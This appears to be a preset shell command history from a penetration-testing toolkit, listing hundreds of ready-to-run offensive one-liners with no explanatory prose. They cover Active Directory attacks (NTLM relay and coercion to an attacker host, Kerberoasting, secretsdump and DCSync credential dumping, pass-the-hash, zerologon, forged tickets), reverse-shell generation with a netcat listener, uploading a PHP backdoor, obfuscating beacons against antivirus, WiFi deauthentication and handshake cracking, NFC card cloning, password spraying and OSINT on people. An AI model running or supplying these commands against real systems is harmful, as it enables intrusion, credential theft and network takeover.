responder --interface eth0 --analyze --disable-ess
responder --interface eth0 --wpad --lm --disable-ess
responder-http-off
responder-http-on
responder-smb-off
responder-smb-on
bloodhound.py --zip -c All -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -dc "$DC_HOST"
bloodhound.py --zip -c All -d "$DOMAIN" -u "$USER" --hashes 'ffffffffffffffffffffffffffffffff':"$NT_HASH" -dc "$DC_HOST"
nslookup _ldap._tcp.dc._msdcs."$DOMAIN"
nslookup -type=srv _kerberos._tcp."$DOMAIN"
nslookup -type=srv _gc._tcp."$DOMAIN"
nslookup -type=srv _kpasswd._tcp."$DOMAIN"
nslookup -type=srv _ldap._tcp."$DOMAIN"
nslookup -type=srv _ldap._tcp.dc._msdcs."$DOMAIN"
nbtscan -r 192.168.56.0/24
nmap --script dns-srv-enum --script-args dns-srv-enum.domain="$DOMAIN"
mount -o domain="$DOMAIN" -o username="$USER" -o password="$PASSWORD" -t cifs "//$DC_HOST/SYSVOL" /tmp/mnttarget/
rpcdump.py "$DC_HOST" | grep -A 6 MS-RPRN
dementor.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$ATTACKER_IP" "$DC_HOST"
printerbug.py "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST" "$ATTACKER_IP"
ntlmrelayx -t ldaps://"$DC_HOST" -smb2support --add-computer 'EXEGOL-01' 'exegol4thewin' --delegate-access
ntlmrelayx -t ldaps://"$DC_HOST" -smb2support --remove-mic --add-computer 'EXEGOL-01' 'exegol4thewin' --delegate-access
ntlmrelayx -t ldap://"$DC_HOST" -smb2support --escalate-user 'EXEGOL-01$'
ntlmrelayx -t ldap://"$DC_HOST" -smb2support --interactive
curl --ntlm -u "$USER":"$PASSWORD" 127.0.0.1
getST.py -spn "host/$TARGET" -impersonate 'domainadmin' -dc-ip "$DC_IP" "$DOMAIN"/'EXEGOL-01$':'exegol4thewin'
secretsdump -k -outputfile "$DOMAIN" "$DC_HOST"
secretsdump -outputfile "$DOMAIN" -just-dc -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST"
rpcclient -U '' -N "$DC_HOST"
rpcclient -U "$DOMAIN"/"$USER" "$TARGET"
pth-net rpc group members 'Domain admins' -U "$DOMAIN"/"$USER"%'ffffffffffffffffffffffffffffffff':"$NT_HASH" -S "$DC_HOST"
pth-net rpc group addmem 'Domain admins' 'attacker_user' -U "$DOMAIN"/"$USER"%'ffffffffffffffffffffffffffffffff':"$NT_HASH" -S "$DC_HOST"
cme smb 192.168.56.0/24 --gen-relay-list smb_targets.txt
mitm6 --interface eth0
mitm6 --interface eth0 --domain "$DOMAIN"
responder --interface eth0 --wpad --lm --ProxyAuth --disable-ess
ntlmrelayx -tf targets.txt -w -6 -smb2support -socks
proxychains secretsdump -no-pass "$DOMAIN"/"$USER"@"$TARGET"
proxychains smbexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET"
proxychains psexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET"
proxychains atexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET"
proxychains wmiexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET"
proxychains dcomexec.py -no-pass "$DOMAIN"/"$USER"@"$TARGET"
proxychains lsassy -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -K lsass_loot -o lsass_creds.txt "$TARGET"
psexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
smbexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
wmiexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
wmiexec.py -codec cp850 -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
atexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
dcomexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
dcomexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
cme smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M enum_avproducts
cme smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M mimikatz
sprayhound -d "$DOMAIN" -dc "$DC_HOST" -nu 'neo4j' -np 'exegol4thewin' -lu "$USER" -lp "$PASSWORD" -p 'somepassword'
sprayhound -d "$DOMAIN" -dc "$DC_HOST" -nu 'neo4j' -np 'exegol4thewin' -lu "$USER" -lp "$PASSWORD"
lsassy -v -u "$USER" -H "$NT_HASH" -K lsass_loot -o lsass_creds.txt 192.168.56.0/24
lsassy -v -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -K lsass_loot -o lsass_creds.txt 192.168.56.0/24
KRB5CCNAME="ticket.ccache" lsassy -k -d "$DOMAIN" -u "$USER" -K lsass_loot -o lsass_creds.txt "$TARGET"
masscan -v -p 1-65535 --rate=10000 -e eth0 192.168.56.0/24
masscan -v -p 1-65535,U:1-65535 --rate=10000 -e eth0 192.168.56.0/24
gobuster dir -w `fzf-wordlists` -u http://192.168.56.0:8000/
kr scan hosts.txt -A=apiroutes-210328:20000 -x 5 -j 100 --fail-status-codes 400,401,404,403,501,502,426,411
kr scan target.com -w routes.kite -A=apiroutes-210328:20000 -x 20 -j 1 --fail-status-codes 400,401,404,403,501,502,426,411
kr brute https://target.com/subapp/ -A=aspx-210328:20000 -x 20 -j 1
kr brute https://target.com/subapp/ -w dirsearch.txt -x 20 -j 1 -exml,asp,aspx,ashx -D
kr scan https://target.com:8443/ -w  /opt/tools/kiterunner/routes-large.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34
kr scan target.com -w /opt/tools/kiterunner/routes-large.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34
kr scan targets.txt -w /opt/tools/kiterunner/routes-small.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34
cme smb 192.168.56.0/24 -u '' -p '' --shares
cme smb 192.168.56.0/24 --local-auth -u '' -p ''
cme smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --shares
cme smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --sessions
cme smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --loggedon-users
privexchange.py -ah "$ATTACKER_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$TARGET"
neo4j start
lnk-generate.py --host "$ATTACKER_IP" --type ntlm --output '@SHUTDOWN-LNK.lnk'
autorecon 192.168.10.10
nmap --script=ldap-search -p 389 192.168.10.10
nmap -p 5900 --script=realvnc-auth-bypass 192.168.10.10
dirb http://192.168.10.10 /usr/share/seclists/Discovery/Web-Content/big.txt
gobuster dir -w `fzf-wordlists` -t 20 -x php,txt,pl,sh,asp,aspx,html,json,py,cfm,rb,cgi,bak,tar.gz,tgz,zip -u "http://$TARGET/"
smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10
smtp-user-enum -M EXPN -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10
onesixtyone 192.168.10.10 private
onesixtyone 192.168.10.10 public
onesixtyone 192.168.10.10 manager
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 192.168.10.10
snmpwalk -c public -v 1 192.168.10.10
snmpwalk -c public -v 2c 192.168.10.10
cewl --depth 10 --with-numbers --write cewl.txt 192.168.10.10
wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --plugins-version-detection passive --password-attack xmlrpc -U 'admin' -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt
wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --plugins-detection aggressive
wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --enumerate u1-20
nmblookup -A 192.168.10.10
nmap --script 'smb-enum*' --script-args unsafe=1 -T5 192.168.10.10
smbmap -H 192.168.10.10
smbmap -u guest -H 192.168.10.10
smbmap -H 192.168.10.10 -R
smbmap -H 192.168.10.10 -R test
smbclient --list 192.168.10.10
smbclient --no-pass --user '' //192.168.10.10/SYSVOL
smbclient --no-pass --user '' --list 192.168.10.10
smbclient.py "$DOMAIN"/user:astrongpassword@192.168.56.201
nmap --script smb-enum-shares -p 139,445 -T4 -Pn 192.168.10.10
amap -d 192.168.10.10 4455
nikto -host 192.168.10.10
dotdotpwn -m payload -h 192.168.10.10 -x 80 -p request.req -k 'root:' -f /etc/passwd
dotdotpwn -m stdout -d 5 -f /etc/passwd
kadimus -u "http://$TARGET/?page=file1.php"
kadimus --cookie 'PHPSESSID=qsh5s21mo54qds7v5384f1q34' -u "http://$TARGET/?page=file1.php"
shellerator --reverse-shell --ip "$ATTACKER_IP" --port 1337 --type powershell
shellerator
rlwrap nc -lvnp 1337
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip "$DC_IP" "$DOMAIN"/
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip "$DC_IP" "$DOMAIN"/"$USER":"$PASSWORD"
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile users.txt -dc-ip "$DC_IP" "$DOMAIN"/
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 -dc-ip "$DC_IP" "$DOMAIN"/"$USER"
hashcat --status --hash-type 18200 --attack-mode 0 ASREProastables.txt `fzf-wordlists`
john --wordlist=`fzf-wordlists` ASREProastables.txt
GetUserSPNs.py -outputfile Kerberoastables.txt -no-preauth "$USER" -usersfile "services.txt" -dc-host "$DC_IP" "$DOMAIN"/
GetUserSPNs.py -outputfile Kerberoastables.txt -dc-ip "$DC_IP" "$DOMAIN"/"$USER":"$PASSWORD"
GetUserSPNs.py -outputfile Kerberoastables.txt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 -dc-ip "$DC_IP" "$DOMAIN"/Administrator
hashcat --status --hash-type 13100 --attack-mode 0 Kerberoastables.txt `fzf-wordlists`
john --format=krb5tgs --wordlist=`fzf-wordlists` Kerberoastables.txt
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt --fork=10 HashToPwn.txt --rules=all
polenum -u "$USER" -p "$PASSWORD" -d "$DC_HOST"
cme smb "$TARGET" -u '' -p '' --pass-pol
addcomputer.py -computer-name 'SHUTDOWN$' -computer-pass '123soleil!' -dc-host DC01 -domain-netbios "$DOMAIN" "$DOMAIN"/"$USER":"$PASSWORD"
smbexec.py -share 'ADMIN$' -k "$TARGET"
wmiexec.py -k "$TARGET"
getST.py -spn CIFS/"$TARGET" -impersonate Administrator -dc-ip "$DC_IP" "$DOMAIN"/"$USER":"$PASSWORD"
secretsdump -just-dc-user krbtgt -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST"
lookupsid.py -hashes :"$NT_HASH" "$DOMAIN"/Administrator@"$DC_HOST" 0
ticketer.py -nthash "$NT_HASH" -domain-sid S-1-5-11-39129514-1145628974-103568174 -domain "$DOMAIN" randomuser
ticketer.py -nthash "$NT_HASH" -spn HOST/"$TARGET" -domain-sid "$DOMAIN_SID" -domain "$DOMAIN" randomuser
export KRB5CCNAME=randomuser.ccache
secretsdump -k "$TARGET"
hashcat --status --hash-type 1000 --attack-mode 0 --username "$DOMAIN".ntds `fzf-wordlists`
hashcat --hash-type 1000 --potfile-path "$DOMAIN".ntds.cracked "$DOMAIN".ntds --show --username
cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --asreproast ASREProastables.txt --kdcHost "$DC_HOST"
cme ldap "$DC_HOST"h -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --kerberoasting Kerberoastables.txt --kdcHost "$DC_HOST"
ldapsearch -x -l "$DC_HOST" -D '' -w '' -b 'dc=DOMAIN,dc=LOCAL'
addspn.py -u "$DOMAIN"\\'SV01$' -p "ffffffffffffffffffffffffffffffff":"$NT_HASH" -s "HOST/EXEGOL-01.$DOMAIN" --additional "$DC_HOST"
dnstool.py -u "$DOMAIN"\\'SV01$' -p "ffffffffffffffffffffffffffffffff":"$NT_HASH" -r "EXEGOL-01.$DOMAIN" -d "$ATTACKER_IP" --action add "$DC_HOST"
krbrelayx.py -aesKey "9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab"
addspn.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" -t SV01 -s "HTTP/EXEGOL-01.$DOMAIN" --additional "$DC_HOST"
dnstool.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" -r "EXEGOL-01.$DOMAIN" -d "$ATTACKER_IP" --action add "$DC_HOST"
dnstool.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" -r "EXEGOL-01.$DOMAIN" -d 192.168.56.1 --action query "$DC_HOST"
privexchange.py -u "$USER" -p "$PASSWORD" -ah "EXEGOL-01.$DOMAIN" EXCHANGE."$DOMAIN" -d "$DOMAIN"
krbrelayx.py --krbpass "$PASSWORD" --krbsalt DOMAIN.LOCALSV01 -t ldap://"$DC_HOST" --escalate-user "$USER"
wfuzz -c --hw 157 -L -w `fzf-wordlists` -w `fzf-wordlists` -X POST -d 'username=FUZZ&password=FUZ2Z' -u "http://$TARGET/admin"
wfuzz --hc 401 -c -v -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -w /usr/share/seclists/Passwords/darkweb2017-top100.txt --basic "FUZZ:FUZ2Z" -u "http://$TARGET/secretpage"
pypykatz lsa minidump lsass.dmp
enyx 1 public 192.168.10.10
wfuzz --hc 403,404 -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -u "http://$TARGET/FUZZFUZ2Z"
fcrackzip -u -v -D -p /usr/share/wordlists/rockyou.txt file.zip
ffuf -fs 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.machine.org' -u "http://$TARGET/"
ffuf -fs 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.org' -u "http://$TARGET/"
ffuf -c -w `fzf-wordlists` -e .php,.txt,.pl,.sh,.asp,.aspx,.html,.json,.py,.cfm,.rb,.cgi,.bak,.tar.gz,.tgz,.zip -u "http://$TARGET/FUZZ"
ffuf -c -w `fzf-wordlists` -u "http://$TARGET/FUZZ" --extract-links
ffuf -c -w `fzf-wordlists` -u "http://$TARGET/FUZZ"
wfuzz --hh 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.machine.org' -u "http://$TARGET/"
wfuzz --hh 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.org' -u "http://$TARGET/"
evil-winrm -u "$USER" -p "$PASSWORD" -i "$TARGET"
evil-winrm -u "$USER" -H "$NT_HASH" -i "$TARGET"
cme smb "$TARGET" --continue-on-success -u users.txt -p passwords.txt
cme smb "$TARGET" --continue-on-success --no-bruteforce -u users.txt -p passwords.txt
enum4linux-ng -A -u "$DOMAIN"/"$USER" -p "$PASSWORD" "$DC_HOST"
enum4linux-ng -A "$TARGET"
nmap -sS -p 3268,3269 192.168.56.0/24
nmap -sC -sV -p 139,445,80,21 192.168.56.201
nmap -Pn -v -sS -F 192.168.56.0/24
curl "$TARGET" --upload-file backdoor.php -v
net rpc password 'targetuser' "$PASSWORD" -U "$DOMAIN"/"$USER"%"$PASSWORD" -S "$DC_HOST"
net rpc user add 'targetuser' "$PASSWORD" -U "$DOMAIN"/"$USER"%"$PASSWORD" -S "$DC_HOST"
pth-net rpc password 'targetuser' "$PASSWORD" -U "$DOMAIN"/"$USER"%'ffffffffffffffffffffffffffffffff':"$NT_HASH" -S "$DC_HOST"
zerologon-scan DC01 "$DC_HOST"
secretsdump -no-pass "$DOMAIN"/'DC01$'@"$DC_HOST"
secretsdump -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST"
secretsdump -ldapfilter '(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=2))' -just-dc -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$DC_HOST"
secretsdump -ldapfilter '(&(objectClass=user)(adminCount=1))' -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 "$DOMAIN"/Administrator@"$DC_HOST"
zerologon-restore "$DOMAIN"/dc01@"$DC_HOST" -target-ip "$TARGET" -hexpass "69762...6945d"
pm3 -p /dev/ttyACM0
proxmark3 -p /dev/ttyACM0
nmap --script http-ntlm-info --script-args http-ntlm-info.root=/ews/ -p 443 mx.example.com
ruler -k -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -e "j.doe@example.com" --verbose abk dump -o emails.txt
ruler -k -d "$DOMAIN" brute --users owa-valid-users.txt --passwords passwords.txt --delay 35 --attempts 3 --verbose | tee -a spray-results.txt
oaburl.py "$DOMAIN"/"$USER":"$PASSWORD"@"mx.example.com" -e "existent.email@example.com"
cypheroth -u neo4j -p exegol4thewin -d "$DOMAIN"
nmap -sS -n --open -p 88 192.168.56.0/24
windapsearch --dc "$DC_HOST" --module metadata
windapsearch --dc "$DC_HOST" --module users
nmap --script broadcast-dhcp-discover
SimplyEmail -all -e cybersyndicates.com
ssh-keygen -t rsa -b 4096 -f keyname
hashcat --username --hash-type 0 --attack-mode 0 MD5_hashes.txt `fzf-wordlists`
rbcd.py t-delegate-to 'sv01$' -dc-ip "$DC_IP" -action read "$DOMAIN"/"$USER":"$PASSWORD"
rbcd.py -delegate-from "$USER" -delegate-to 'sv01$' -dc-ip "$DC_IP" -action write "$DOMAIN"/"$USER":"$PASSWORD"
rbcd.py -delegate-from "$USER" -delegate-to 'sv01$' -dc-ip "$DC_IP" -action remove "$DOMAIN"/"$USER":"$PASSWORD"
xfreerdp /d:"$DOMAIN" /u:"$USER" /pth:"$NT_HASH" /v:"$TARGET" /cert-ignore
darkarmour -f /data/beacon.exe --encrypt xor --jmp --loop 7 -o /data/legit.exe
amber -f beacon.exe
hcxdumptool -I
hcxdumptool -i wlan1 -o dump.pcapng --active_beacon --enable_status=1
hcxpcapngtool -o dump.hashcat dump.pcapng
hcxhashtool -i dump.hashcat --info stdout
hashcat --hash-type 16800 --attack-mode 0 dump_WPA-PMKID-PBKDF2.hashcat `fzf-wordlists`
hcxpcapngtool --all -o dump.hashcat dump.pcapng
hashcat --hash-type 22000 --attack-mode 0 dump_WPA-PBKDF2-PMKID_EAPOL.hashcat `fzf-wordlists`
responder --interface eth0 --analyze --lm --disable-ess
ntlmv1-multi --ntlmv1 SV01$::DOMAIN.LOCAL:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788
airmon-ng start wlan1
airodump-ng wlan1
airodump-ng -c 1 wlan1
aireplay-ng --deauth 10 -a TR:GT:AP:BS:SS:ID wlan1
sublist3r -v -d "$DOMAIN"
subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl
holehe test@gmail.com
theHarvester.py -d "$DOMAIN" -g -s -r -f "$DOMAIN.xml" -b all
infoga.py -d "$DOMAIN" -s all -b -r "$DOMAIN.txt" -v 2
h8mail -t test@gmail.com
phoneinfoga scan -n 33123456789
maigret "username"
linkedin2username.py -u myname@email.com -c uber-com
toutatis.py -s SESSIONID -u starbucks
twint -u username --since '2015-12-20 20:30:15'
twint -g='48.880048,2.385939,1km' -o file.csv --csv
ipinfo 1.1.1.1
onionsearch 'computer'
onionsearch 'computer' --engines tor66 deeplink phobos --limit 3
waybackurls test.com
carbon14.py http://menfous.com/
github-email ghusername
WikiLeaker google.com
tiktok-scraper user USERNAME -d -n 100
buster -e 'j********9@g****.com' -f john -l doe -b '****1989'
cloudfail.py --target seo.com --tor
assetfinder google.com
subfinder -d freelancer.com
theHarvester -d github.com -b all
nfc-scan-device -v
nfc-list
mfoc -O original.dmp
mfoc -O magic-gen1.dmp
mfdread original.dmp
nfc-mfclassic W A B original.dmp magic-gen1.dmp
libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B
mfoc -O original.dmp -k keys.txt
nrf24-scanner.py -l -v
jackit --reset --debug
secretsdump -ntds ntds.dit.save -system system.save LOCAL
gosecretsdump -ntds ntds.dit.save -system system.save
screen /dev/ttyACM0 115200
httpmethods --threads 40 --location "http://$TARGET/"
echo "http://$TARGET/" | hakrawler -d 10
adidnsdump -u "$DOMAIN"\\"$USER" -p "$PASSWORD" --print-zones "$TARGET"
proxychains adidnsdump --dns-tcp -u "$DOMAIN"\\"$USER" -p "$PASSWORD" --print-zones "$TARGET"
ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken
feroxbuster -w `fzf-wordlists` -u "http://$TARGET/"
bloodhound-import -du neo4j -dp exegol4thewin *.json
bloodhound-quickwin -u neo4j -p exegol4thewin
ldapsearch-ad --server "$DC_HOST" --domain "$DOMAIN" --username "$USER" --password "$PASSWORD" --type all
ldapsearch-ad --server "$DC_HOST" --type info
dnstool.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" --record '*' --action query "$DC_HOST"
dnstool.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" --record '*' --action add --data "$ATTACKER_IP" "$DC_HOST"
ntlm-scanner -vuln CVE-2019-1019 -target "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST"
ntlm-scanner -vuln CVE-2019-1338 -target "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST"
ntlm-scanner -vuln CVE-2019-1166 -target "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST"
ntlm-scanner -vuln CVE-2019-1040 -target "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST"
das add -db dbname masscan '-e eth0 --rate 1000 -iL hosts.txt --open -p1-65535'
das add -db dbname rustscan '-b 1000 -t 2000 -u 5000 -a hosts.txt -r 1-65535 -g --no-config --scan-order "Random"'
das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' -parallel
das scan -db dbname -ports 22,80,443,445 -show
das report -hosts 192.168.1.0/24 -oA report2
hashcat --status --hash-type 2100 --attack-mode 0 '$DCC2$10240#user#bb38628253e7681553b72e7da3adf305' `fzf-wordlists`
pypykatz kerberos tgt "kerberos+rc4://$DOMAIN\\$USER:$NT_HASH@$DOMAIN"
ms14-068.py -u "$USER"@"$DOMAIN" --rc4 "$NT_HASH" -s "$DOMAIN_SID" -d "$DC_HOST"
getST.py -k -no-pass -spn host/"$DC_HOST" "$DOMAIN"/"$USER"
ldapdomaindump --user "$DOMAIN"\\"$USER" --password "$PASSWORD" --outdir ldapdomaindump "$DC_HOST"
Get-GPPPassword -debug -no-pass "$DC_HOST"
Get-GPPPassword "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST"
cme smb --list-modules
cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -M maq
ntlmrelayx -t dcsync://"$DC_HOST" -smb2support
whatportis 3306
whatportis postgresql
cmsmap -F -d "http://$TARGET/"
clusterd -i "http://$TARGET/"
dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -u "http://$TARGET/"
moodlescan -r -u "http://$TARGET/"
pywhisker.py -v -d "$DOMAIN" -u "$USER" -H "$NT_HASH" -t 'sv01$' -a 'add'
gettgtpkinit.py -cert-pfx 'sv01.pfx' -pfx-pass 'RLLXdD5FhNPRphSqKGg8' "$DOMAIN"/'sv01$' 'sv01.ccache'
KRB5CCNAME='sv01.ccache' getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72' "$DOMAIN"/'sv01$'
petitpotam.py "$ATTACKER_IP" "$DC_HOST"
petitpotam.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$ATTACKER_IP" "$DC_HOST"
dfscoerce.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$ATTACKER_IP" "$DC_HOST"
coercer -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --listener "$ATTACKER_IP" --target "$DC_HOST"
coercer -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --webdav-host 'machine_name' --target "$DC_HOST"
ntlmrelayx -t ldap://"$DC_HOST" -smb2support --remove-mic --shadow-credentials --shadow-target 'dc01$'
targetedKerberoast.py -v -d "$DOMAIN" -u user1 -p complexpassword -o Kerberoastables.txt
pass-station search tomcat
nth --text 5f4dcc3b5aa765d61d8327deb882cf99
pywsus.py --host "$ATTACKER_IP" --port 8530 --executable /opt/resources/windows/sysinternals/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"'
DonPAPI.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"
webclientservicescanner -dc-ip "$DC_HOST" "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST"
ntlmrelayx -t "http://pki.$DOMAIN/certsrv/certfnsh.asp" --adcs
echo '8.8.8.8' | hakrevdns
prips 192.168.0.0 192.168.0.255
prips -i4 192.168.0.10 192.168.0.250
prips 173.0.84.0/24 | hakrevdns
nuclei -u https://example.com
httpx -probe -list hosts.txt -tech-detect -status-code -fr
prips 192.168.56.0/24|hakrevdns -d|httpx -probe -tech-detect -status-code -fr
ntpdate -u "$TARGET"
renameMachine.py -current-name 'testcomputer$' -new-name 'DC01' -dc-ip "$DC_HOST" "$DOMAIN"/"$USER":"$PASSWORD"
getTGT.py -dc-ip "$DC_HOST" "$DOMAIN"/'DC01':'123pentest'
renameMachine.py -current-name 'DC01' -new-name 'testcomputer$' -dc-ip "$DC_HOST" "$DOMAIN"/"$USER":"$PASSWORD"
KRB5CCNAME='DC01.ccache' getST.py -self -impersonate 'domainadmin' -k -no-pass -dc-ip "$DC_HOST" "$DOMAIN"/"$DC_HOST"
KRB5CCNAME='domainadmin.ccache' secretsdump -just-dc-user 'krbtgt' -dc-ip "$DC_HOST" -k -no-pass @"$DC_HOST"
pwndb --target @example.com --output txt
robotstester -u http://www.example.com/ -L
shadowcoerce.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$ATTACKER_IP" "$TARGET"
faketime '2022-01-31 22:05:35' zsh
manspider --threads 50 192.168.56.0/24 -d "$DOMAIN" -u "$USER" -H "$NT_HASH" --content administrateur
gMSADumper.py -d "$DOMAIN" -l "$DC_HOST" -u "$USER" -p "$PASSWORD"
modifyCertTemplate.py -template KerberosAuthentication -get-acl "$DOMAIN"/"$USER":"$PASSWORD"
smbserver.py -smb2support SHUTDOWN .
reg.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" save -keyName 'HKLM\SAM' -o '\\192.168.56.1\SHUTDOWN'
reg.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" save -keyName 'HKLM\SYSTEM' -o '\\192.168.56.1\SHUTDOWN'
reg.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" save -keyName 'HKLM\SECURITY' -o '\\192.168.56.1\SHUTDOWN'
reg.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" backup -o '\\192.168.56.1\SHUTDOWN'
secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
pyLAPS.py --action get -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --dc-ip "$DC_IP"
FindUncommonShares.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --dc-ip "$DC_IP"
certipy find -u "$USER@$DOMAIN" -p "$PASSWORD" -old-bloodhound
LdapRelayScan.py -method BOTH -dc-ip "$DC_IP" -u "$USER" -p "$PASSWORD"
goldencopy --tools all --password 'exegol4thewin' --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 'john'
crackhound.py --verbose --password 'exegol4thewin' --plain-text --plain-text --domain "$DOMAIN" --file ownedusers.txt --add-password
kerbrute userenum -d "$DOMAIN" usernames.txt
kerbrute passwordspray -d "$DOMAIN" domain_users.txt Password123
kerbrute bruteuser -d "$DOMAIN" passwords.lst thoffman
tls-scanner -connect "$TARGET":443
hekatomb -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" -debug -dnstcp
gowitness nmap -f nmap.xml --open --service-contains http --delay 5 --timeout 5
goshs -d /workspace -b user:Secret.123 -s -ss
goshs -p 8081 -d /opt/resources -ro
goshs -p 8082 -d /my-ressources -ro
sslyze --sslv2 --sslv3 --tlsv1 --tlsv1_1 --tlsv1_2 --tlsv1_3 --heartbleed --robot --openssl_ccs --compression --reneg --certinfo --elliptic_curves --early_data --fallback --json_out=sslyze.json $TARGET
# -=-=-=-=-=-=-=- YOUR COMMANDS BELOW -=-=-=-=-=-=-=- #
